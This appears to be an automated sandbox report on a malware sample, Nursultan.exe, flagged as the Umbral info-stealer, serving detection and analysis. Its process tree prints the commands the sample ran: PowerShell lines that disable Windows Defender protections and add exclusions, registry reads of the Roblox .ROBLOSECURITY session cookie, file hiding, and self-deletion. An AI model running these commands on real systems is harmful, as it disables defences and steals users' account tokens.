Analysis

  • max time kernel
    1330s
  • max time network
    1153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-07-2024 22:20

General

  • Target

    Nursultan.exe

  • Size

    13.3MB

  • MD5

    f6c0feffe54fa282026b99660ee2f36e

  • SHA1

    1df776d7ee9fca88331dd7451704811ffaaeeca9

  • SHA256

    a8e15ff3f763f5f153b46ba983847396c121e055942473863aaf40368e62c198

  • SHA512

    bb14c616b5e0dd6259e24ce8a9c2e6f5fd5e40518c8f13a200b52330c56465620460d24b2f820b34615b9120fbeb8d366bfc80b7d6ab88d8adfcf3e7e19afe23

  • SSDEEP

    196608:nB2xmjsScoe5Q1QmUrctfXJqsg/WAGlBE32no2qouSgiKB0nOgM8pg50d1/Kc6IX:imIFTmUIwsgCm3t2GyKG5jMtIQvA9

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3832
    • C:\Users\Admin\AppData\Local\Temp\роблакс.exe
      "C:\Users\Admin\AppData\Local\Temp\роблакс.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:4700
    • C:\Users\Admin\AppData\Local\Temp\Лаунчер VIP тарифа.exe
      "C:\Users\Admin\AppData\Local\Temp\Лаунчер VIP тарифа.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4736
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Лаунчер VIP тарифа.exe"
        3⤵
        • Views/modifies file attributes
        PID:2100
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Лаунчер VIP тарифа.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3088
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4044
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2952
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:764
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:4036
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:3852
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1032
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:3188
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Лаунчер VIP тарифа.exe" && pause
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:892
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • Runs ping.exe
              PID:4000

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        e4d5f16dff1c6c4bd78c48253f411da2

        SHA1

        0fb7366585572b2cf4144d169302ba21d8e71ac3

        SHA256

        360fe2bf9d46f0e6bb35c1b41ba0d70c5f10a1a9b42e29d9cafea37de5964133

        SHA512

        27cb84814bf84d0db623e68c06b6391e63d985d5fe77a9d6ca9093329fbe73da490bb9bef67fea667d2d03b1d42ed5b4591f9e72c281c15965d0765c019d4b69

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        77d622bb1a5b250869a3238b9bc1402b

        SHA1

        d47f4003c2554b9dfc4c16f22460b331886b191b

        SHA256

        f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

        SHA512

        d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        efe05055dc30f1da03bd1653594f8b0a

        SHA1

        8650a67ec9d1b8eed7caa4e4c86ebb8531bc7ba2

        SHA256

        10b3d946f07601b28c5cd6ee36fd0fffb41f3d96094a478d088ce30ebf9a694d

        SHA512

        5096856b34336cafbd2ee4dc4709bfa39c8794d8fc42777a460b79d52482b699013f237dfee2ecaf2b21487cc933b807bc5bad9b81f7070ba0dc4f6efcfa2f36

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        e0ec6bf376a6b15852bce768196c5ed0

        SHA1

        05fe4e592ebbb7e29f36b8d30a6a90ba29bd4f81

        SHA256

        2d4a39cbbd597a7cfff477817c3c7c541c14974c8d234b4c0de6d229e3a3ce97

        SHA512

        dc0c7d3d127c88affea9ae402d7358c079cfa7fc3ecb417085e31dc749da1406e72563bfbe42167fdad57e10aa0c6cca7a8ba06921b3a1212ad7ccee1a0f859b

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oaa5ar0u.tgz.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\Лаунчер VIP тарифа.exe

        Filesize

        229KB

        MD5

        932bb925ba94fb9096eabb74c165d022

        SHA1

        ab7d3a610df8f692c0274d960b570f35df23b478

        SHA256

        d71c1bb48698064988136ff5e9284c2ffbc6bffcd7b8c6e39b00d7a9e85c3087

        SHA512

        a36e76dc82b4efc41b312763c7ede87aa0b02f7a0067e89ac84461675b228ac024ab91d1e61b03a193948ce8904f20de2e14ce965d8db814c8e36c621b24d355

      • C:\Users\Admin\AppData\Local\Temp\роблакс.exe

        Filesize

        14.4MB

        MD5

        888b6182409ced36aaea7f22268bceab

        SHA1

        b62d12c12f46c739e34241bc3590b6888c31d7f4

        SHA256

        11ccb1d864900ecb4d5c683d8e83dc6c0f55d8c89bcd7357e310598b7846d0de

        SHA512

        b6398b5a1cf3ae0b698cc7074d2a59d1415689b50f2e7751164fd22e8fd2024ea0d97590366c30c74a0539e6cc83f8fcac0b53e5f68e62d98d242646b4a9c72e

      • memory/3032-22-0x0000015D8EDC0000-0x0000015D8EE00000-memory.dmp

        Filesize

        256KB

      • memory/3032-112-0x00007FF86A550000-0x00007FF86B011000-memory.dmp

        Filesize

        10.8MB

      • memory/3032-24-0x00007FF86A550000-0x00007FF86B011000-memory.dmp

        Filesize

        10.8MB

      • memory/3032-94-0x0000015DA92F0000-0x0000015DA9302000-memory.dmp

        Filesize

        72KB

      • memory/3032-93-0x0000015DA92C0000-0x0000015DA92CA000-memory.dmp

        Filesize

        40KB

      • memory/3032-55-0x0000015DA9570000-0x0000015DA95E6000-memory.dmp

        Filesize

        472KB

      • memory/3032-56-0x0000015DA9250000-0x0000015DA92A0000-memory.dmp

        Filesize

        320KB

      • memory/3032-57-0x0000015D90A40000-0x0000015D90A5E000-memory.dmp

        Filesize

        120KB

      • memory/3088-26-0x000001F14CBB0000-0x000001F14CBD2000-memory.dmp

        Filesize

        136KB

      • memory/3832-2-0x00007FF86A550000-0x00007FF86B011000-memory.dmp

        Filesize

        10.8MB

      • memory/3832-0-0x00007FF86A553000-0x00007FF86A555000-memory.dmp

        Filesize

        8KB

      • memory/3832-1-0x0000000000AC0000-0x0000000001812000-memory.dmp

        Filesize

        13.3MB

      • memory/3832-23-0x00007FF86A550000-0x00007FF86B011000-memory.dmp

        Filesize

        10.8MB

      • memory/4700-49-0x0000000140000000-0x0000000141C1B000-memory.dmp

        Filesize

        28.1MB

      • memory/4700-47-0x00007FF8887D0000-0x00007FF8887D2000-memory.dmp

        Filesize

        8KB